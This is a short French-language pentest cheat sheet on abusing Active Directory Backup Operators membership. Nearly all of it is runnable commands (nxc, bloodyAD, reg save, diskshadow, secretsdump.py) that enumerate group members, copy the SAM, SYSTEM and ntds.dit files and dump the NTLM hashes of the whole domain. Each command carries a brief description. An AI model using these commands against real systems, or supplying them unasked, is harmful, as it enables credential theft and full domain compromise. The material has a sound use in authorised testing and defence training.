Copy command
nxc ldap $DC -u $USER -p $PASS -M get-desc-users | grep -i backupDescription: Identifier les comptes membres du groupe Backup Operators via les descriptions.
Exploitation
Abus du groupe Backup Operators pour extraire SAM, SYSTEM et ntds.dit.
nxc ldap $DC -u $USER -p $PASS -M get-desc-users | grep -i backupDescription: Identifier les comptes membres du groupe Backup Operators via les descriptions.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Backup Operators'Description: Lister les membres actuels du groupe Backup Operators.
reg save HKLM\SAM C:\Temp\SAM && reg save HKLM\SYSTEM C:\Temp\SYSTEMDescription: Backup Operator peut sauvegarder SAM et SYSTEM : extraction locale des hashes NTLM.
secretsdump.py -sam SAM -system SYSTEM LOCALDescription: Extraire les hashes depuis les fichiers SAM/SYSTEM sauvegardés en local.
diskshadow.exe /s shadow.dslDescription: Utiliser VSS via diskshadow pour accéder à ntds.dit en contournant les verrous NTFS.
secretsdump.py -ntds ntds.dit -system SYSTEM LOCALDescription: Extraire tous les hashes du domaine depuis ntds.dit + SYSTEM récupérés via VSS.